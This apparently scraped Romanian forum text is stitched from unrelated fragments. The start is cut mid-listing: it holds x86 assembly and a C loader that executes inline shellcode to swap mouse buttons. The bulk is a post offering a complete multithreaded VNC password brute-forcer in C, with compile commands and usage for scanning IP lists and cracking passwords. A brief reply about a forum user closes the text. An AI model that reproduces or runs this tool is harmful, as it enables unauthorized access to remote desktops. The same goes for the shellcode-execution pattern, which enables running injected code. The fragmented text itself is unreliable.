esp, 0x14 ; Cleanup stack xor ecx, ecx ; ECX = 0 inc ecx ; true push ecx ; 1 call eax ; Swap! add esp, 0x4 ; Clean stack pop edx ; GetProcAddress pop ebx ; kernel32.dll base address mov ecx, 0x61737365 ; essa push ecx sub dword ptr [esp + 0x3], 0x61 ; Remove "a" push 0x636f7250 ; Proc push 0x74697845 ; Exit push esp push ebx ; kernel32.dll base address call edx ; GetProc(Exec) xor ecx, ecx ; ECX = 0 push ecx ; Return code = 0 call eax ; ExitProcess */ #include "stdafx.h" #include <Windows.h> int main() { char *shellcode = "\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72\x65\x75" "\xE2\x8B\x72\x24\x03\xF3\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3\x8B\x14\x8E\x03\xD3\x33\xC9\x53\x52\x51\x68\x61\x72\x79\x41\x68" "\x4C\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C\x51\x68\x33\x32\x2E\x64\x68\x75\x73" "\x65\x72\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24\x04\x33\xC9\x51\xB9\x74\x6F\x6E\x61\x51\x83\x6C\x24\x03\x61\x68\x65\x42\x75\x74\x68" "\x4D\x6F\x75\x73\x68\x53\x77\x61\x70\x54\x50\xFF\xD2\x83\xC4\x14\x33\xC9" "\x41" // inc ecx - Remove this to restore the functionality "\x51\xFF\xD0\x83\xC4\x04\x5A\x5B\xB9\x65\x73\x73\x61" "\x51\x83\x6C\x24\x03\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69\x74\x54\x53\xFF\xD2\x33\xC9\x51\xFF\xD0"; // Set memory as executable DWORD old = 0; BOOL ret = VirtualProtect(shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &old); // Call the shellcode __asm { jmp shellcode; } return 0; }

Am vrut sa fac un brute de vncuri, fiindca din cate am vazut pe net, n-am gasit nici unul foarte rapid. Folosirea e simpla, aveti nevoie de openssl instalat si il compilati cu gcc -o vnc vnc.c -lcrypto -lpthread. #include <stdio.h> #include <string.h> #include <stdlib.h> #include <openssl/des.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/mman.h> #include <signal.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #include <pthread.h> #include <ctype.h> #define RED "\E[1;32;31m" #define GREEN "\E[1;32;40m" #define WHITE "\E[1;37;40m" #define NORMAL "\E[m" #define CLEARLN "\033[F\033[J" #define CONNECT_TIMEOUT 2 #define READ_TIMEOUT 5 #define LOCK(x) pthread_mutex_lock(&x); #define UNLOCK(x) pthread_mutex_unlock(&x); static int maxqueue = 0; static int brutemode = 0; struct host_queue{ char * host; char * pass; struct host_queue * next; }; struct combi { char * host; char * pass; }; static time_t start, lmin; static FILE *ipfile = NULL; static FILE *outfile = NULL; static FILE *passfile = NULL; static int finished = 0; static int done = 0; static int good = 0; static int total = 0; static long qsize = 0; static long lastmin = 0; static int dmin = 0; static struct host_queue * jobs = NULL; static pthread_mutex_t stat_lock = PTHREAD_MUTEX_INITIALIZER; static pthread_mutex_t job_lock = PTHREAD_MUTEX_INITIALIZER; static pthread_cond_t job_cond = PTHREAD_COND_INITIALIZER; static pthread_cond_t job_size_cond = PTHREAD_COND_INITIALIZER; static void usage(const char *s) { printf(RED"Usage: %s <check|brute>\n"NORMAL, s); exit(EXIT_SUCCESS); } static void usage_check(const char *s) { printf(RED"Usage: %s check <vnc list> <threads>\n"NORMAL, s); exit(EXIT_SUCCESS); } static void usage_brute(const char *s) { printf(RED"Usage: %s brute <vnc list> <passfile> <threads>\n"NORMAL, s); exit(EXIT_SUCCESS); } static void save_no_auth(const char *host) { FILE *noauth = fopen("no.auth", "a+"); fprintf(noauth, "%s\n", host); fclose(noauth); } static void save_vnc_list(const char *host) { FILE *vnclist= fopen("vnc.list", "a+"); fprintf(vnclist, "%s\n", host); fclose(vnclist); } static void queue_job(char *h, char *p) { struct host_queue * hq = (struct host_queue *) malloc(sizeof(struct host_queue)); hq->host = h; hq->pass = p; hq->next = NULL; LOCK(job_lock); while(qsize >= maxqueue) pthread_cond_wait(&job_size_cond, &job_lock); if(jobs == NULL) jobs = hq; else { hq->next = jobs; jobs = hq; } ++qsize; pthread_cond_signal(&job_cond); UNLOCK(job_lock); } static struct combi * dequeue_job(void){ struct combi * trynow = (struct combi *) malloc(sizeof(struct combi)); LOCK(job_lock); while(jobs == NULL){ LOCK(stat_lock); if(done == 1){ UNLOCK(stat_lock); UNLOCK(job_lock); free(trynow); return NULL; } UNLOCK(stat_lock); pthread_cond_wait(&job_cond, &job_lock); } trynow->host = jobs->host; trynow->pass = jobs->pass; struct host_queue * hq = jobs; jobs = jobs->next; --qsize; pthread_cond_signal(&job_size_cond); UNLOCK(job_lock); free(hq); return trynow; } static int send_msg(int sockfd, char *message) { int n; fd_set rset; struct timeval timeout; FD_ZERO(&rset); FD_SET (sockfd, &rset); timeout.tv_sec = READ_TIMEOUT; timeout.tv_usec = 0; n = select (sockfd + 1, NULL, &rset, NULL, &timeout); if (n < 0) return -1; else if (n == 0) return -1; else n = send(sockfd, message, strlen(message), MSG_NOSIGNAL); return n; } static int recv_msg(int sockfd, char **retmes) { int n; char *buffer = (char *) malloc(512); bzero(buffer, 512); *retmes = NULL; fd_set rset; struct timeval timeout; FD_ZERO(&rset); FD_SET (sockfd, &rset); timeout.tv_sec = READ_TIMEOUT; timeout.tv_usec = 0; n = select (sockfd + 1, &rset, NULL, NULL, &timeout); if(n <= 0) { free(buffer); return 0; } else n = read(sockfd, buffer, 511); *retmes = buffer; return n; } static char *Encrypt(char *Key, char *Msg, int size, char **dest) { char *Res = NULL; int n=0; DES_cblock Key2, decry, plain1, plain2, result1, result2; DES_key_schedule schedule; Res = (char *) malloc(size + 1); bzero(Res, size + 1); memcpy(Key2, Key, 8); memcpy(plain1, Msg, 8); memcpy(plain2, Msg + 8, 8); DES_set_odd_parity( &Key2 ); DES_set_key(&Key2, &schedule ); DES_ecb_encrypt(&plain1, &result1, &schedule, DES_ENCRYPT); DES_ecb_encrypt(&plain2, &result2, &schedule, DES_ENCRYPT); memcpy(Res, result1, 8); memcpy(Res + 8, result2, 8); *dest = Res; return NULL; } static int checknow(const char *host, const char *pass) { int sockfd, rc, i, n = 0, tmax = 0; long arg; unsigned char newkey[8]; bzero(newkey, 8); for (i=0;i<strlen(pass);i++) { int a = pass[i]; int b = 0; int j; for (j=0; j<8; j++) if (a & (1<<j)) b = b | (1<<7-j); unsigned char d = b; newkey[i] = d; } newkey[i] = '\0'; struct sockaddr_in remoteaddr; remoteaddr.sin_family = AF_INET; remoteaddr.sin_addr.s_addr = inet_addr(host); remoteaddr.sin_port = htons(5900); retry: sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) goto retry; struct linger so_linger; so_linger.l_onoff = 1; so_linger.l_linger = 0; struct timeval tv; int valopt; tv.tv_sec = CONNECT_TIMEOUT; tv.tv_usec = 0; if(setsockopt(sockfd, SOL_SOCKET, SO_LINGER, &so_linger, sizeof so_linger) > 0) { close(sockfd); goto retry; } if(setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv))) { close(sockfd); goto retry; } if(setsockopt(sockfd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv))) { close(sockfd); goto retry; } char *recbuf = NULL; if (connect(sockfd, (struct sockaddr *)&remoteaddr, sizeof(remoteaddr)) < 0) { if (errno == EINPROGRESS) { fd_set write_fds; memset(&write_fds, 0, sizeof(write_fds)); FD_ZERO(&write_fds); FD_SET(sockfd, &write_fds); if (select(sockfd+1, NULL, &write_fds, NULL, &tv) > 0) { socklen_t lon; lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) goto first; } else goto first; } else goto first; } n = recv_msg(sockfd, &recbuf); if(n == 0 || !strstr(recbuf, "RFB 00") || n > 12) goto first; char *proto = malloc(13 * sizeof(char)); bzero(proto, 13); if((recbuf[6] == '3' && recbuf[10] == '8') || (recbuf[6] == '4' && recbuf[10] == '1')) sprintf(proto, "RFB 003.008\n"); else if(recbuf[6] == '3' && recbuf[10] == '7') sprintf(proto, "RFB 003.007\n"); else sprintf(proto, "RFB 003.003\n"); if(send_msg(sockfd, proto) < 0) { free(proto); goto first; } free(recbuf); n = recv_msg(sockfd, &recbuf); if(n == 0) { free(proto); goto first; } unsigned char *response = malloc(17 * sizeof(char)); bzero(response, 17); int code; if(proto[10] == '7' || proto[10] == '8') { free(proto); int numberauth = recbuf[0], auth_supported = 0; for(i=1; i<numberauth + 1; i++) { if(recbuf[i] == 1) save_no_auth(host); else if(recbuf[i] == 2) auth_supported = 1; } if(auth_supported == 0) { free(response); goto first; } if(brutemode == 1) { LOCK(stat_lock); good++; UNLOCK(stat_lock); long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); LOCK(stat_lock); save_vnc_list(host); UNLOCK(stat_lock); tmax = 3; free(response); goto first; } char authchar[1]; authchar[0] = '\x02'; if(send_msg(sockfd, authchar) < 0) { free(response); goto first; } free(recbuf); n = recv_msg(sockfd, &recbuf); if(n != 16) { free(response); goto first; } memcpy(response, recbuf, 16); } else { free(proto); code = recbuf[3]; if(code == 1) { save_no_auth(host); free(response); goto first; } else if(code == 2 && n >= 20) { if(brutemode == 1) { LOCK(stat_lock); good++; UNLOCK(stat_lock); long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); LOCK(stat_lock); save_vnc_list(host); UNLOCK(stat_lock); free(response); tmax = 3; goto first; } memcpy(response, recbuf + n - 16, 16); } else { free(response); goto first; } } char *encrypted = NULL; Encrypt(newkey, response, 16, &encrypted); free(response); free(recbuf); if(send_msg(sockfd, encrypted) < 0) { free(encrypted); goto first; } free(encrypted); n = recv_msg(sockfd, &recbuf); if(n != 4) goto first; code = recbuf[3]; long lpassed = time(0) - lmin; if(lpassed == 60) { LOCK(stat_lock); lastmin = dmin / lpassed; dmin=0; lmin=time(0); UNLOCK(stat_lock); } long passed = time(0) - start; printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed); if(code == 0) { LOCK(stat_lock); printf(CLEARLN""GREEN"[+] Valid: %s: %s\n\n"NORMAL, host, pass); FILE *logfile = fopen("vnc.good", "a+"); fprintf(logfile, "%s %s\n", host, pass); fclose(logfile); UNLOCK(stat_lock); } first: LOCK(stat_lock); dmin++; finished++; UNLOCK(stat_lock); free(recbuf); close(sockfd); return -1; } static void *worker_thread(void *worker) { while(1) { struct combi *trynow = dequeue_job(); if(trynow == NULL) break; char *host = NULL, *pass = NULL; host = trynow->host; pass = trynow->pass; if(host == NULL || pass == NULL) break; checknow(host, pass); free(trynow); free(host); if(brutemode == 2) free(pass); } pthread_exit(NULL); } int main(int argc, char **argv) { char ip[32] = {0}, pass[32] = {0}; if (argc < 2) usage(argv[0]); if ((strcmp(argv[1], "check") == 0) && (argc != 4)) usage_check(argv[0]); else if((strcmp(argv[1], "brute") == 0) && (argc != 5)) usage_brute(argv[0]); else if(strcmp(argv[1], "check") != 0 && strcmp(argv[1], "brute") != 0) usage(argv[0]); if (strcmp(argv[1], "check") == 0) brutemode = 1; else if(strcmp(argv[1], "brute") == 0) brutemode = 2; int num_threads; char *list_host = NULL, *list_pass = NULL; if (brutemode == 1) { list_host = argv[2]; num_threads = atoi(argv[3]); } else { list_host = argv[2]; list_pass = argv[3]; num_threads = atoi(argv[4]); } maxqueue = num_threads; if(brutemode == 2) printf(WHITE"[*] IP List: %s Passwords: %s Threads: %d Log: vnc.good\n\n"NORMAL, list_host, list_pass, num_threads); else printf(WHITE"[*] IP List: %s Threads: %d Log: vnc.list\n\n"NORMAL, list_host, num_threads); start = time(0); lmin = time(0); if(!(ipfile = fopen(list_host, "r"))) { printf("INVALID IP FILE: %s\n", argv[1]); exit(0); } fclose(ipfile); char **passwords; int pcount=0; if(brutemode == 2) { if(!(passfile = fopen(list_pass, "r"))) { printf("INVALID PASSWORDS FILE: %s\n", argv[3]); exit(0); } fclose(passfile); passfile = fopen(list_pass, "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass != NULL) pcount++; } fclose(passfile); passwords = malloc(pcount * sizeof(char*)); pcount = 0; passfile = fopen(list_pass, "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass != NULL) { passwords[pcount] = malloc((strlen(pass)+1)*sizeof(char)); strcpy(passwords[pcount], pass); pcount++; } } fclose(passfile); } int i; pthread_t *thread = (pthread_t *) malloc(sizeof(pthread_t)*num_threads); pthread_attr_t attrs; pthread_attr_init(&attrs); pthread_attr_setdetachstate(&attrs, PTHREAD_CREATE_DETACHED); for(i=0; i<num_threads; i++) { pthread_create(&thread[i], &attrs, worker_thread, NULL); pthread_detach(thread[i]); } if(brutemode == 1) { ipfile = fopen(list_host, "r"); while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip) - 1] == '\n') ip[strlen(ip) - 1] = '\0'; if (ip != NULL) { char *host = (char *)malloc(strlen(ip) + 1); strcpy(host, ip); queue_job(host, "checkmod"); } } fclose(ipfile); } else { int pc=0; for(pc=0; pc<pcount; pc++) { printf(CLEARLN""WHITE"[+]Working now with: %s\n\n"NORMAL, passwords[pc]); ipfile = fopen(list_host, "r"); while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip) - 1] == '\n') ip[strlen(ip) - 1] = '\0'; if (ip != NULL) { char *host = (char *)malloc(strlen(ip) + 1); char *pass = (char *)malloc(strlen(passwords[pc]) + 1); strcpy(host, ip); strcpy(pass, passwords[pc]); queue_job(host, pass); } } fclose(ipfile); } } done=1; for(i=0; i < num_threads; i++) pthread_cond_signal(&job_cond); pthread_mutex_destroy(&job_lock); pthread_cond_destroy(&job_cond); sleep(20); free(thread); exit(0); } Daca aveti lista de ipuri si vreti doar sa verificati care au VNC si suporta autentificare dati: ./vnc check listaipuri numarthreaduri Daca doriti sa faceti bruteforce direct: ./vnc brute listaipuri listaparole numarthreaduri Daca gasiti vreun bug sau aveti sugestii de imbunatatire lasati mesaj

asta e? https://rstforums.com/forum/profile/16455-thejudger/content/ nu am auzit de el.